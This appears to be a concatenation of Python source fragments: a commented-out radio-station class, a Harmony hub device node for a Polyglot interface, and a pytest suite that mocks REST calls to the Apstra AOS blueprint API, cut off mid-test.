# else:
# return self.label <= other.label
#
# def __ge__(self, other):
# if type(other) is not RadioStation:
# return 0
# else:
# return self.label >= other.label
#
#
# class RadioClass(RadioStation):
# def __init__(self, station_name, station_folder, station_data, *args, **kwargs):
# # self.station_data = [folder, station_name, station_files, station_ordered, station_lengths, station_waveforms]
#
# self.label = station_name
# self.directory = station_folder
# self.files = deque(station_data[2])
# self.song_lengths = deque(station_data[4])
# self.total_length = station_data[5]
# try:
# self.waveforms = deque(eval(station_data[6]))
# except:
# self.waveforms = []
#
# super(RadioClass, self).__init__(self, *args, **kwargs)
|
from udi_interface import Node,LOGGER
class Device(Node):
def __init__(self, parent, address, name):
# The id (node_def_id) is the address because each hub has a unique nodedef in the profile.
self.did = address
address = "d" + address
self.id = address
self.parent = parent
super(Device, self).__init__(parent.controller.poly, parent.address, address, name)
#self.name = name
#self.address = address
self.hub = parent
# Only Hub devices are polled.
self.do_poll = False
parent.controller.poly.subscribe(parent.controller.poly.START, self.handler_start, address)
def handler_start(self):
self.setDriver('ST', 1)
def setOn(self, command):
self.setDriver('ST', 1)
def setOff(self, command):
self.setDriver('ST', 0)
def query(self):
self.reportDrivers()
def _get_button_label(self,index):
"""
Convert from button/function index from nls to real label
because pyharmony needs the label.
"""
LOGGER.debug("index=%d" % (index))
# TODO: Make sure it's a valid index?
return self.parent.harmony_config['info']['functions'][index]['label']
def _get_button_command(self,index):
"""
Convert from button/function index from nls to real label
because pyharmony needs the label.
"""
LOGGER.debug("index=%d" % (index))
if index <= len(self.parent.harmony_config['info']['functions']):
if not self.did in self.parent.harmony_config['info']['functions'][index]['command']:
LOGGER.debug("This device id={0} not in command hash = {1}".format(self.did,self.parent.harmony_config['info']['functions'][index]['command']))
return False
command = self.parent.harmony_config['info']['functions'][index]['command'][self.did]
LOGGER.debug("command=%s" % (command))
return command
else:
LOGGER.debug("index={0} is not in functions len={1}: {2}".format(index,len(self.parent.harmony_config['info']['functions']),self.parent.harmony_config['info']['functions']))
return False
def _send_command_by_index(self,index):
LOGGER.debug("index=%d" % (index))
name = self._get_button_command(index)
if name is False:
LOGGER.debug("No name for index %d" % (index))
return False
LOGGER.debug("index=%d, name=%s" % (index,name))
return self._send_command(name)
def _send_command(self,name):
LOGGER.debug("name=%s" % (name))
# Push it to the Hub
if self.hub.client is None:
LOGGER.debug("No Client for command '%s'." % (name))
ret = False
else:
ret = self.hub.client.send_command(self.did,name)
LOGGER.debug("%s,%s result=%s" % (str(self.did),name,str(ret)))
# TODO: This always returns None :(
ret = True
return ret
def _cmd_set_button(self, command):
"""
This runs when ISY calls set button which passes the button index
"""
index = int(command.get('value'))
LOGGER.debug("index=%d" % (index))
return self._send_command_by_index(index)
def _cmd_don(self, command):
"""
This runs when ISY calls set button which passes the button index
"""
LOGGER.debug("")
# TODO: If no PowerOn command, do PowerToggle
return self._send_command('PowerOn')
def _cmd_dof(self, command):
"""
This runs when ISY calls set button which passes the button index
"""
LOGGER.debug("")
# TODO: If no PowerOn command, do PowerToggle
return self._send_command('PowerOff')
drivers = [{'driver': 'ST', 'value': 0, 'uom': 2}]
id = 'HarmonyDevice'
commands = {
'SET_BUTTON': _cmd_set_button,
'DON': _cmd_don,
'DOF': _cmd_dof,
}
|
# Copyright 2020-present, Apstra, Inc. All rights reserved.
#
# This source code is licensed under End User License Agreement found in the
# LICENSE file at http://www.apstra.com/eula
# pylint: disable=redefined-outer-name
import json
import pytest
from unittest import mock
from unittest.mock import call
from aos.client import AosClient
from aos.aos import AosRestAPI, AosAPIError, AosInputError
from aos.blueprint import (
Blueprint,
Device,
AosBPCommitError,
Anomaly,
SecurityZone,
VirtualNetwork,
ResourceGroup,
)
from requests.utils import requote_uri
from tests.util import make_session, read_fixture, deserialize_fixture
@pytest.fixture(params=["3.3.0", "4.0.0"])
def aos_api_version(request):
return request.param
@pytest.fixture
def aos_session():
return make_session()
@pytest.fixture
def aos(aos_session):
return AosClient(protocol="http", host="aos", port=80, session=aos_session)
@pytest.fixture
def expected_auth_headers():
headers = AosRestAPI.default_headers.copy()
headers["AuthToken"] = "token"
return headers
@pytest.fixture
def aos_logged_in(aos, aos_session):
successful_login_resp = {"token": "token", "id": "user-id"}
aos_session.add_response(
"POST",
"http://aos:80/api/aaa/login",
status=200,
resp=json.dumps(successful_login_resp),
)
resp = aos.auth.login(username="user", password="pass")
assert resp.token == "token"
aos_session.request.call_args_list.pop()
aos_session.request.call_count = aos_session.request.call_count - 1
return aos
def test_get_all_ids(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
assert aos_logged_in.blueprint.get_all_ids() == [
Blueprint(
id="evpn-cvx-virtual",
label="evpn-cvx-virtual",
),
Blueprint(
id="37e5bf9d-46e6-4479-85e9-96ecf47e00e0",
label="test",
),
]
aos_session.request.assert_called_once_with(
"GET",
"http://aos:80/api/blueprints",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_get_bp_by_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_name = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_name}",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/single_blueprint.json"),
)
resp = aos_logged_in.blueprint.get_bp(bp_name=bp_name)
assert resp["label"] == bp_name
assert resp["id"] == bp_name
assert resp["design"] == "two_stage_l3clos"
def test_get_bp_by_name_invalid(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_name = "BP-does-not-exist"
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_name}",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/single_blueprint.json"),
)
with pytest.raises(AosAPIError):
aos_logged_in.blueprint.get_bp(bp_name=bp_name)
def test_get_bp_by_id(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/single_blueprint.json"),
)
resp = aos_logged_in.blueprint.get_bp(bp_id=bp_id)
assert resp["label"] == bp_id
assert resp["id"] == bp_id
assert resp["design"] == "two_stage_l3clos"
def test_get_bp_by_id_invalid(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "BP-does-not-exist"
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}",
status=404,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprint_404.json"),
)
with pytest.raises(AosAPIError):
aos_logged_in.blueprint.get_bp(bp_id=bp_id)
def test_add_bp_by_temp_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
template_name = "lab_evpn_mlag"
bp_body = {
"design": "two_stage_l3clos",
"init_type": "template_reference",
"label": "test-bp",
"template_id": template_name,
}
bp_resp = {"id": "test-bp", "task_id": "test-bp"}
aos_session.add_response(
"GET",
"http://aos:80/api/design/templates",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/design/get_templates.json"),
)
aos_session.add_response(
"POST",
"http://aos:80/api/blueprints/",
status=201,
resp=json.dumps(bp_resp),
)
resp = aos_logged_in.blueprint.add_blueprint(
label="test-bp", template_name=template_name
)
assert resp == bp_resp
aos_session.request.assert_called_with(
"POST",
"http://aos:80/api/blueprints/",
params=None,
json=bp_body,
headers=expected_auth_headers,
)
def test_add_bp_by_temp_name_invalid(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
template_name = "test-name-bad"
aos_session.add_response(
"GET",
"http://aos:80/api/design/templates",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/design/get_templates.json"),
)
with pytest.raises(AosInputError):
aos_logged_in.blueprint.add_blueprint(
label="test-bp", template_name=template_name
)
aos_session.request.assert_called_with(
"GET",
"http://aos:80/api/design/templates",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_add_bp_by_temp_id(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
template_id = "lab_evpn_mlag"
bp_body = {
"design": "two_stage_l3clos",
"init_type": "template_reference",
"label": "test-bp",
"template_id": template_id,
}
bp_resp = {"id": "test-bp", "task_id": "test-bp"}
aos_session.add_response(
"POST",
"http://aos:80/api/blueprints/",
status=201,
resp=json.dumps(bp_resp),
)
resp = aos_logged_in.blueprint.add_blueprint(
label="test-bp", template_id=template_id
)
assert resp == bp_resp
aos_session.request.assert_called_with(
"POST",
"http://aos:80/api/blueprints/",
params=None,
json=bp_body,
headers=expected_auth_headers,
)
def test_add_bp_by_temp_id_invalid(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
template_id = "1111-bad-id"
bp_body = {
"design": "two_stage_l3clos",
"init_type": "template_reference",
"label": "test-bp",
"template_id": template_id,
}
bp_resp = {"errors": {"template_id": "Design template not found: template_id"}}
aos_session.add_response(
"POST",
"http://aos:80/api/blueprints/",
status=422,
resp=json.dumps(bp_resp),
)
with pytest.raises(AosAPIError):
aos_logged_in.blueprint.add_blueprint(
label="test-bp", template_id=template_id
)
aos_session.request.assert_called_with(
"POST",
"http://aos:80/api/blueprints/",
params=None,
json=bp_body,
headers=expected_auth_headers,
)
# TODO (Ryan): Parameterize all resource_type and group_name options
def test_assign_asn_pool_to_bp(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
resource_type = "asn"
group_name = "spine_asns"
asn_pool_id = "evpn-asn"
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_name}",
status=202,
resp=json.dumps(""),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/{resource_type}"
f"/{group_name}",
status=200,
resp=json.dumps(
{"type": "asn", "name": "spine_asns", "pool_ids": [asn_pool_id]}
),
)
assert aos_logged_in.blueprint.apply_resource_groups(
bp_id=bp_id,
resource_type=resource_type,
group_name=group_name,
pool_ids=[asn_pool_id],
) == ResourceGroup(
type=resource_type,
name=group_name,
group_name=group_name,
pool_ids=[asn_pool_id],
)
rg_body = {
"pool_ids": [asn_pool_id],
}
aos_session.request.assert_has_calls(
[
call(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_name}",
params=None,
json=rg_body,
headers=expected_auth_headers,
),
call(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_name}",
json=None,
params=None,
headers=expected_auth_headers,
),
]
)
def test_commit_staging_errors(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/diff-status",
status=202,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/bp_staging_version.json"
),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/errors",
status=202,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/bp_errors_active.json"),
)
with pytest.raises(AosBPCommitError):
aos_logged_in.blueprint.commit_staging(bp_id, "test_test")
aos_session.request.assert_called_with(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/deploy",
params=None,
json={"version": 3, "description": "test_test"},
headers=expected_auth_headers,
)
def test_commit_staging(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/diff-status",
status=202,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/bp_staging_version.json"
),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/errors",
status=202,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/bp_errors_clear.json"),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/deploy",
status=202,
resp=json.dumps(""),
)
aos_logged_in.blueprint.commit_staging(bp_id, "test_test")
aos_session.request.assert_called_with(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/deploy",
params=None,
json={"version": 3, "description": "test_test"},
headers=expected_auth_headers,
)
def test_get_deployed_devices(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/get_deployed_devices_devices.json"
),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/get_deployed_devices_mlag.json"
),
)
assert aos_logged_in.blueprint.get_deployed_devices(bp_id) == [
Device(
label="leaf3-leaf-switch",
system_id="84819c8a-a402-424e-94fd-90c459f046d9",
),
Device(
label="evpn_mlag_001_leaf_pair1",
system_id="d120c55b-4f40-4b10-8376-021fe099d632",
),
]
def test_get_security_zone_id(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
sz_fixture = f"aos/{aos_api_version}/blueprints/get_security_zone_id.json"
bp_id = "evpn-cvx-virtual"
sz_id = "78eff7d7-e936-4e6e-a9f7-079b9aa45f98"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones/{sz_id}",
status=200,
resp=read_fixture(sz_fixture),
)
sz_dict = deserialize_fixture(sz_fixture)
assert aos_logged_in.blueprint.get_security_zone(
bp_id=bp_id, sz_id=sz_id
) == SecurityZone(
label=sz_dict["label"],
id=sz_id,
routing_policy=mock.ANY,
routing_policy_id=mock.ANY,
vni_id=sz_dict["vni_id"],
sz_type=sz_dict["sz_type"],
vrf_name=sz_dict["vrf_name"],
rt_policy=sz_dict["rt_policy"],
route_target=sz_dict["route_target"],
vlan_id=sz_dict["vlan_id"],
)
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones/{sz_id}",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_get_security_zone_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
sz_fixture = f"aos/{aos_api_version}/blueprints/get_security_zone_id.json"
sz_all_fixture = f"aos/{aos_api_version}/blueprints/get_security_zones.json"
bp_id = "evpn-cvx-virtual"
sz_name = "blue"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
status=200,
resp=read_fixture(sz_all_fixture),
)
sz_dict = deserialize_fixture(sz_fixture)
assert aos_logged_in.blueprint.find_sz_by_name(
bp_id=bp_id, name=sz_name
) == SecurityZone(
label=sz_name,
id=sz_dict["id"],
routing_policy=mock.ANY,
routing_policy_id=mock.ANY,
vni_id=sz_dict["vni_id"],
sz_type=sz_dict["sz_type"],
vrf_name=sz_dict["vrf_name"],
rt_policy=sz_dict["rt_policy"],
route_target=sz_dict["route_target"],
vlan_id=sz_dict["vlan_id"],
)
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_create_security_zone(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
sz_fixture = f"aos/{aos_api_version}/blueprints/get_security_zone_id.json"
tasks_fixture = f"aos/{aos_api_version}/blueprints/get_bp_tasks_complete.json"
task_id_fixture = f"aos/{aos_api_version}/blueprints/get_bp_task_id.json"
all_fixture = f"aos/{aos_api_version}/blueprints/get_security_zones.json"
bp_id = "evpn-cvx-virtual"
sz_name = "blue"
create_task_id = "d20a8a52-d311-4df7-a8ec-271d8e2325d1"
sz_id = "78eff7d7-e936-4e6e-a9f7-079b9aa45f98"
resource_type = "ip"
group_name = "leaf_loopback_ips"
group_path = requote_uri(f"sz:{sz_id},{group_name}")
pool_id = "leaf-loopback-pool-id"
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
status=200,
params={"async": "full"},
resp=json.dumps({"task_id": create_task_id}),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/tasks",
status=200,
resp=read_fixture(tasks_fixture),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/tasks/{create_task_id}",
status=200,
resp=read_fixture(task_id_fixture),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
status=200,
resp=read_fixture(all_fixture),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones/{sz_id}",
status=200,
resp=read_fixture(sz_fixture),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_path}",
status=202,
resp=json.dumps(""),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/security-zones/{sz_id}/dhcp-servers",
status=204,
resp=json.dumps(""),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_path}",
status=200,
resp=json.dumps(
{"type": "ip", "name": f"sz:{sz_id},{group_name}", "pool_ids": [pool_id]}
),
)
resp = aos_logged_in.blueprint.create_security_zone(
bp_id=bp_id,
name=sz_name,
import_policy="all",
leaf_loopback_ip_pools=[pool_id],
dhcp_servers=["1.1.1.1"],
)
sz_dict = deserialize_fixture(sz_fixture)
assert resp == SecurityZone(
label=sz_name,
id=sz_dict["id"],
routing_policy=mock.ANY,
routing_policy_id=mock.ANY,
vni_id=sz_dict["vni_id"],
sz_type=sz_dict["sz_type"],
vrf_name=sz_dict["vrf_name"],
rt_policy=sz_dict["rt_policy"],
route_target=sz_dict["route_target"],
vlan_id=sz_dict["vlan_id"],
)
def test_get_virtual_network_id(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
vn_fixture = f"aos/{aos_api_version}/blueprints/get_virtual_network_id.json"
bp_id = "evpn-cvx-virtual"
vn_name = "test-blue15"
vn_id = "307944e0-8aa5-4108-9253-0c453a653bde"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
status=200,
resp=read_fixture(vn_fixture),
)
vn_dict = deserialize_fixture(vn_fixture)
assert aos_logged_in.blueprint.get_virtual_network(
bp_id=bp_id, vn_id=vn_id
) == VirtualNetwork(
label=vn_name,
id=vn_id,
description=None,
ipv4_enabled=vn_dict["ipv4_enabled"],
ipv4_subnet=vn_dict["ipv4_subnet"],
virtual_gateway_ipv4=vn_dict["virtual_gateway_ipv4"],
ipv6_enabled=False,
ipv6_subnet=None,
virtual_gateway_ipv6=None,
vn_id=vn_dict["vn_id"],
security_zone_id=vn_dict["security_zone_id"],
svi_ips=vn_dict["svi_ips"],
virtual_mac=vn_dict["virtual_mac"],
default_endpoint_tag_types={},
endpoints=vn_dict["endpoints"],
bound_to=vn_dict["bound_to"],
vn_type=vn_dict["vn_type"],
rt_policy=vn_dict["rt_policy"],
dhcp_service=vn_dict["dhcp_service"],
tagged_ct=False,
untagged_ct=False,
)
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_get_virtual_network_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
vn_fixture = f"aos/{aos_api_version}/blueprints/get_virtual_network_id.json"
all_fixture = f"aos/{aos_api_version}/blueprints/get_virtual_networks.json"
bp_id = "evpn-cvx-virtual"
vn_name = "test-blue15"
vn_id = "307944e0-8aa5-4108-9253-0c453a653bde"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks",
status=200,
resp=read_fixture(all_fixture),
)
vn_dict = deserialize_fixture(vn_fixture)
assert aos_logged_in.blueprint.find_vn_by_name(
bp_id=bp_id, name=vn_name
) == VirtualNetwork(
label=vn_name,
id=vn_id,
description=None,
ipv4_enabled=vn_dict["ipv4_enabled"],
ipv4_subnet=vn_dict["ipv4_subnet"],
virtual_gateway_ipv4=vn_dict["virtual_gateway_ipv4"],
ipv6_enabled=False,
ipv6_subnet=None,
virtual_gateway_ipv6=None,
vn_id=vn_dict["vn_id"],
security_zone_id=vn_dict["security_zone_id"],
svi_ips=mock.ANY,
virtual_mac=vn_dict["virtual_mac"],
default_endpoint_tag_types={},
endpoints=mock.ANY,
bound_to=vn_dict["bound_to"],
vn_type=vn_dict["vn_type"],
rt_policy=vn_dict["rt_policy"],
dhcp_service=vn_dict["dhcp_service"],
tagged_ct=False,
untagged_ct=False,
)
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_create_virtual_network(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
vn_fixture = f"aos/{aos_api_version}/blueprints/get_virtual_network_id.json"
sz_all_fixture = f"aos/{aos_api_version}/blueprints/get_security_zones.json"
bp_id = "evpn-cvx-virtual"
sz_name = "blue"
sz_id = "78eff7d7-e936-4e6e-a9f7-079b9aa45f98"
vn_id = "307944e0-8aa5-4108-9253-0c453a653bde"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
status=200,
resp=read_fixture(sz_all_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks",
status=202,
params=None,
resp=json.dumps({"id": vn_id}),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
status=200,
resp=read_fixture(vn_fixture),
)
aos_logged_in.blueprint.create_virtual_network(
bp_id=bp_id,
name="blue-test1",
bound_to=mock.ANY,
sz_name=sz_name,
)
bound_to = deserialize_fixture(vn_fixture)["bound_to"]
expected_body = {
"label": "blue-test1",
"security_zone_id": sz_id,
"vn_type": "vxlan",
"vn_id": None,
"bound_to": bound_to,
"ipv4_enabled": True,
"dhcp_service": "dhcpServiceEnabled",
"ipv4_subnet": None,
"ipv4_gateway": None,
}
aos_session.request.assert_has_calls(
[
call(
"POST",
"http://aos:80/api/aaa/login",
json=mock.ANY,
params=None,
headers=mock.ANY,
),
call(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
params=None,
json=None,
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks",
params=None,
json=expected_body,
headers=mock.ANY,
),
call(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
params=None,
json=None,
headers=mock.ANY,
),
call(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/virtual-networks/{vn_id}",
params=None,
json=None,
headers=mock.ANY,
),
]
)
def test_apply_configlet(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
conf_id = "test-conf-id"
conf_fixture = f"aos/{aos_api_version}/design/get_configlet_id.json"
conf_role = ["spine", "leaf"]
aos_session.add_response(
"GET",
f"http://aos:80/api/design/configlets/{conf_id}",
status=200,
resp=read_fixture(conf_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/configlets",
status=202,
resp=json.dumps({"id": conf_id}),
)
resp_payload = {"id": conf_id}
assert (
aos_logged_in.blueprint.apply_configlet(
bp_id=bp_id, configlet_id=conf_id, role=conf_role
)
== resp_payload
)
conf_dict = deserialize_fixture(conf_fixture)
json_body = {
"configlet": conf_dict,
"label": conf_dict["display_name"],
"condition": f"role in {conf_role}",
}
aos_session.request.assert_called_with(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/configlets",
params=None,
json=json_body,
headers=expected_auth_headers,
)
def test_apply_configlet_invalid_roles(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
conf_id = "test-conf-id"
conf_fixture = f"aos/{aos_api_version}/design/get_configlet_id.json"
aos_session.add_response(
"GET",
f"http://aos:80/api/design/configlets/{conf_id}",
status=200,
resp=read_fixture(conf_fixture),
)
with pytest.raises(AosInputError):
aos_logged_in.blueprint.apply_configlet(bp_id=bp_id, configlet_id=conf_id)
aos_session.request.assert_called_with(
"GET",
f"http://aos:80/api/design/configlets/{conf_id}",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_apply_configlet_combined_conditions(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
conf_id = "test-conf-id"
conf_fixture = f"aos/{aos_api_version}/design/get_configlet_id.json"
conf_role = ["spine", "leaf"]
conf_ids = ["foo", "bar", "monkey"]
aos_session.add_response(
"GET",
f"http://aos:80/api/design/configlets/{conf_id}",
status=200,
resp=read_fixture(conf_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/configlets",
status=202,
resp=json.dumps({"id": conf_id}),
)
resp_payload = {"id": conf_id}
assert (
aos_logged_in.blueprint.apply_configlet(
bp_id=bp_id, configlet_id=conf_id, role=conf_role, system_id=conf_ids
)
== resp_payload
)
conf_dict = deserialize_fixture(conf_fixture)
json_body = {
"configlet": conf_dict,
"label": conf_dict["display_name"],
"condition": f"role in {conf_role} and id in {conf_ids}",
}
aos_session.request.assert_called_with(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/configlets",
params=None,
json=json_body,
headers=expected_auth_headers,
)
def test_apply_property_set(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
ps_id = "test-ps-id"
ps_fixture = f"aos/{aos_api_version}/design/get_property_set_id.json"
aos_session.add_response(
"GET",
f"http://aos:80/api/property-sets/{ps_id}",
status=200,
resp=read_fixture(ps_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/property-sets",
status=202,
resp=json.dumps({"id": ps_id}),
)
resp_payload = {"id": ps_id}
assert (
aos_logged_in.blueprint.apply_property_set(bp_id=bp_id, ps_id=ps_id)
== resp_payload
)
ps_dict = deserialize_fixture(ps_fixture)
ps_keys = []
for k in ps_dict["values"]:
ps_keys.append(k)
json_body = {"keys": ps_keys, "id": ps_dict["id"]}
aos_session.request.assert_called_with(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/property-sets",
params=None,
json=json_body,
headers=expected_auth_headers,
)
def test_apply_property_set_keys(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
ps_id = "test-ps-id"
ps_fixture = f"aos/{aos_api_version}/design/get_property_set_id.json"
ps_keys = ["ntp_server"]
aos_session.add_response(
"GET",
f"http://aos:80/api/property-sets/{ps_id}",
status=200,
resp=read_fixture(ps_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/property-sets",
status=202,
resp=json.dumps({"id": ps_id}),
)
resp_payload = {"id": ps_id}
assert (
aos_logged_in.blueprint.apply_property_set(
bp_id=bp_id, ps_id=ps_id, ps_keys=ps_keys
)
== resp_payload
)
ps_dict = deserialize_fixture(ps_fixture)
json_body = {"keys": ps_keys, "id": ps_dict["id"]}
aos_session.request.assert_called_with(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/property-sets",
params=None,
json=json_body,
headers=expected_auth_headers,
)
def test_assign_interface_map_by_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
node_name = ["spine1", "spine2"]
im_name = "Cumulus_VX__slicer-7x10-1"
node_fixture = f"aos/{aos_api_version}/blueprints/get_bp_nodes.json"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/nodes?node_type=system",
status=200,
resp=read_fixture(node_fixture),
)
aos_session.add_response(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/interface-map-assignments",
status=204,
resp=json.dumps({"id": im_name}),
)
test_json = {
"assignments": {
"83a3a17e-e2f1-4027-ae3c-ebf56dcfaaf5": im_name,
"1717ee47-f0be-4877-8341-18709048e237": im_name,
}
}
assert (
aos_logged_in.blueprint.assign_interface_map_by_name(
bp_id=bp_id, node_names=node_name, im_name=im_name
)
== test_json
)
aos_session.request.assert_called_with(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/interface-map-assignments",
params=None,
json=test_json,
headers=expected_auth_headers,
)
def test_apply_external_router_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
if aos_api_version != "3.3.0":
pytest.skip("External Router not present in 4.0.0+")
bp_id = "evpn-cvx-virtual"
bp_rtr_name = "example_router1"
bp_rtr_id = "92797c82-ff36-4575-9fe2-9e84d998c7b7"
ext_rtr_fixture = f"aos/{aos_api_version}/external_systems/get_ext_rtrs.json"
ext_rlinks = f"aos/{aos_api_version}/blueprints/get_ext_rlinks.json"
ext_rlinks_id = f"aos/{aos_api_version}/blueprints/get_ext_rlinks_id.json"
bp_ext_rtr_fixture = f"aos/{aos_api_version}/blueprints/get_bp_ext_rtr.json"
aos_session.add_response(
"GET",
"http://aos:80/api/resources/external-routers",
status=200,
resp=read_fixture(ext_rtr_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/external-routers",
status=200,
